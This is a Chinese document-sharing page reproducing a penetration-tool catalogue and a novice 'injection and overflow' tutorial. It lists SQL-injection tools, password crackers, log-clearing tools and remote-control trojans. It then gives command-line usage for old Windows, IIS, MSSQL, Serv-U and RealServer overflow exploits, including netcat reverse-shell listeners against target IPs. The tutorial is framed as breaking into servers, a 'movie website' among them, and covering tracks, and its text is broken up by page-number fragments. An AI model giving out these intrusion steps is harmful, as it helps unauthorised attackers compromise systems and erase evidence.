《渗透测试工具大全》由会员分享,可在线阅读,更多相关《渗透测试工具大全(22页珍藏版)》请在金锄头文库上搜索。
1、1渗透工具一、 基于网站的渗透1、名称:Acunetix Web Vulnerability Scanner 6 功能:网站漏洞扫描器。平台:Windows2、名称:IBM Rational AppScan 7.8功能:网站漏洞扫描器。平台:Windows3、名称:Jsky功能:网站漏洞扫描器。平台:Windows4、名称:DTools功能:阿 D 的多功能入侵工具,带扫描、植马等。平台:Windows5、名称:wepoff功能:网站漏洞扫描器。2平台:Linux / Unix6、名称:Domain3.6功能:网站旁注工具。平台:Windows7、名称:casi功能:PHP+MYSQL 注射工
2、具。平台:Windows8、名称:HP WebInspect 7.7功能:网站漏洞扫描器。平台:Windows9、名称:php_bug_scanner功能:PHP 程序漏洞扫描器。平台:Windows10、名称:多线程网站后台扫描工具功能:扫描网站后台管理登陆地址。平台:Windows311、 名称:NStalker功能:网站爬虫。平台:Windows12、名称:挖掘鸡 v6.5功能:挖掘搜索引擎关键字。 平台:Windows13、名称:cookie 注入工具功能:cookies 注入辅助工具。平台:Windows14、名称:httpup功能:通用 HTTP 上传程序。平台:Windows二、
3、基于系统的渗透1、名称:nmap功能:系统端口扫描器。平台:Windows2、名称:Nessus4功能:系统漏洞扫描器。平台:Windows3、名称:X-Scan功能:系统漏洞扫描器。平台:Windows4、名称:SuperScan功能:系统端口扫描器。平台:Windows5、名称:SSS 功能:SSS 扫描器。平台:Windows6、名称:NetCat功能:瑞士军刀。平台:Windows7、名称:Apache Tomcat Crack功能:Tomcat 弱口令扫描器。平台:Windows58、名称:iisputscanner功能:中间件扫描器。平台:Windows9、名称:Metasploi
4、t framework功能:渗透辅助工具。平台:Windows10、名称:Encoder功能:编码转换。平台:Windows11、名称:awstats功能:日志分析工具。平台:Windows12、名称:logclear功能:日志清除工具。平台:Windows13、名称:黑刀超级字典生成器6功能:密码生成。平台:Windows14、名称:溯雪功能:破解网站、邮箱、BBS 登陆密码。平台:Windows15、名称:MD5crack功能:MD5 密码破解工具包。平台:Windows16、名称:webbench功能:压力测试工具,可用于 DDOS。平台:Linux/Unix17、名称:netstumb
5、ler功能:无线网络攻击工具。平台:Windows18、名称:wifizoo功能:无线网络攻击工具。平台:Linux/Unix719、名称:arpsniffer功能:局域网嗅探抓包。平台:Windows20、名称:ethereal功能:局域网嗅探抓包。平台:Windows21、名称:SnifferPro功能:局域网嗅探抓包。平台:Windows22、名称:WinSock Expert功能:网站上传抓包。平台:Windows23、名称:logclear功能:日志清除工具。平台:Windows24、名称:ByShell 、DG 远控、PcShare、TeamViewer8功能:远程控制工具。平台:
6、Windows三、基于数据库的渗透1、名称:DSQLTools功能:啊 D 的 SQL 注入工具。平台:Windows2、名称:nbsi3.0功能:MSSQL 注入工具。平台:Windows3、名称:mysqlweak功能:Mysql 数据库弱口令扫描器。平台:Windows4、名称:pangolin功能:数据库注入工具。平台:Windows5、名称:db2utils功能:DB2 漏洞利用工具。9平台:Linux / Unix6、名称:oscanner功能:Oracle 扫描工具。平台:Windows7、名称:oracle_checkpwd_big功能:Oracle 弱口令猜解工具。平台:Wi
7、ndows四、缓冲区溢出漏洞利用工具1、名称:sql2 功能:ms-sql 的远程溢出工具。平台:Windows2、名称:thcsql 功能:ms-sql 的远程溢出工具;。平台:Windows3、名称:ispc功能:unicode 漏洞的利用工具。10平台:Windows4、名称:lis5hack、idahack功能:.printer 漏洞的远程溢出工具。平台:Windows 5、名称:snake IIS功能:Snake ida、idq 的远程溢出工具。平台:Windows6、名称:aspcode功能:asp 漏洞远程溢出工具。平台:Windows7、名称:webdavx3功能:webdav
8、 漏洞远程溢出工具(isno) 。平台:Windows8、名称:webdav功能:webdav 漏洞溢出工具(yuange) 。平台:Windows119、名称:rpc_locator、 rpc功能:RPC LOCATOR 漏洞的远程溢出工具。平台:Windows10、名称:media功能:media server 远程溢出工具。平台:Windows11、名称:winrpcdcom功能:Windows rpcdcom 的远程溢出工具。平台:Windows12、名称:w2krpcdcom功能:Windows rpcdcom 的远程溢出工具(反向连接) 。平台:Windows13、名称:rpclo
9、name功能:windows rpcdcom 长文件名的远程溢出程序。平台:Windows14、名称:msghack功能:Windows messenger 漏洞的远程溢出程序(ms03-043) 。12平台:Windows15、名称:ms03049功能:Windows workstation 漏洞的远程溢出程序(ms03-049) 。平台:Windows16、名称:winfp30reg2功能:Windows frontpage fp30reg.dll 的远程溢出程序(ms03-051) 。平台:Windows 新手必看之注入和溢出基础教程(附软件下载地址)溢出入侵 因为时间的原因我只 介绍下
10、这些漏洞的是如何利用的不介绍他们是怎么产生的至于怎么修补我会提一下的 在介绍漏洞之前我先介绍几个很不错的扫描软件,毕竟扫描是基础x-san这个扫描软件我想大家不在陌生!他是一个全方位扫描漏洞的软件,他主要是用于扫描漏洞的,当然其他方面的比如固定端口的扫描,ip 的扫描也都是可以的缺点就是速度太慢nmap这个扫描软件功能比较强大!是居于 cmd 界面操作的,只要按照他的提示使用即可,扫描的速度也比较的快,要想快速搞定一台服务器的朋友还是用这个扫描软件比较好x-way这个扫描软件他的功能与其他的扫描软件不同!不只是扫描还包括了很多的小工具!比如查询器, 猜解机. 如果你要猜测什么账号和密码方面的用
11、这个就不错了13现在我在把常见的端口所对应的服务给大家列出来!我觉得了解一下还是很重要的80 全球信息网超文本传输协议 (www)110 pop3 服务器 (邮箱发送服务器 )135 (tcp/ip) 查询服务 dns139 共享资源端口(netbios-ssn)143 imap 电子邮件443 安全服务444 snpp445 nt 的共享资源新端口(139)990 ftps995 pop3s1026 win2000 的 internet 信息服务1243 sub-7 木马1524 ingreslock 后门3128 squid http 代理服务器的默认端口3389 win2000 远程登陆
12、端口4899 remote administrator 远程控制7626 冰河(木马 ) 默认端口12345 netbus 木马 默认端口12346 netbus 木马 默认端口还有象流光呀什么的我想大家 都比较熟悉了 这里就不说了!好了下面开始介绍漏洞和漏洞的利用方法!其操作都是在cmd 下面操作漏洞的利用方法我都翻译成了中文,很适合那种英语学的比较菜的朋友!1.webdav 漏洞 首先要开放 80 端口 要安装了 iis用到的工具 webdavx314利用方法 webdavx3 目标主机 ip2.rpc 漏洞 工具 winrpcdcom 利用方法 winrpcdcom 目标主机 ip(操作
13、系统类型) 目标主机 ip3.idq 首先要安装了 iis利用 正向连接 1.溢出2.telnet 登陆telnet 目标主机 ip 端口反响连接nc -l -p 本机端口3.dcomrpc 溢出漏洞利用 dcomrpc -d 目标主机 ip ortions 有提示ortions -l 6668 绑定 6668 端口在 6668 端口溢出4.rpc long 文件名溢出 此漏洞可以通过 135(tcp/ip ) 139 445 593 端口发起攻击用 msdcomscanner.exe 软件扫描漏洞利用 rpc2sbaa.exe os(操作系统类型 0 1) 目标主机 ip5.rpc loca
14、tor 溢出漏洞扫描软件 rpc-locator.exe ip 段看说明通过注册表改掉 ip在清空连接 建立空连接最好溢出 xlocator 操作系统类型6.iis.asp 影射分块编码远程溢出漏洞 aspcode 溢出扫描的时候扫描 iis 漏洞就可以了漏洞利用aspcode.exe 目标主机 ip asp 文件(iisstart.asp )开放的 web 端口是默认的 80 就不用填 win2000 系统不用填写是 winxp 的话就要填写 winxp7.sql hello exploit 漏洞溢出攻击首先扫描 1433 端口 分析对方是否开放了 1433 端口用 dotpot port
15、ready 1.6 来扫描是否开放 1433 端口溢出工具 15sqlhello漏洞利用sqlhello 反向连接工具 sqlhello 目标主机 ip 目标主机端口 1433 本机 ip 本机端口正向连接 工具 sqlhello2sqlhello2 目标主机 ip 目标主机端口 14338. mssql sql2 溢出 首先扫描 1433 端口是否开放溢出工具 nc 和 sql2.exe 漏洞利用 sql2.exe 目标主机 ip 本机 ip 监听的本机端口 sql 的版本一般为 09.ser-u 溢出 首先扫描 ftp 弱口令溢出工具 serv-u 3.x/4.x serv -i 目标主机 ip -t 0(操作系统类型)-u ftp 登陆账号 -p ftp 登陆密码 -f 21 对方开放的端口默认为 21 -s 溢出后反响连接的端口也就上自己的端口10 电影网站入侵 real server 溢出开放了 real networks real sever 服务的服务器开放后其开放的断口的默认值为 主要检测554 端口rtsp 端口 554pna 端口 7070http 端口 80mms 端口 1755监控端口 9090管理端口 自己设置 其他的断口号也可以改变漏洞利用所要用到的工具 realex溢出步骤1. realex host(目标主机 ip) 操作系统类型
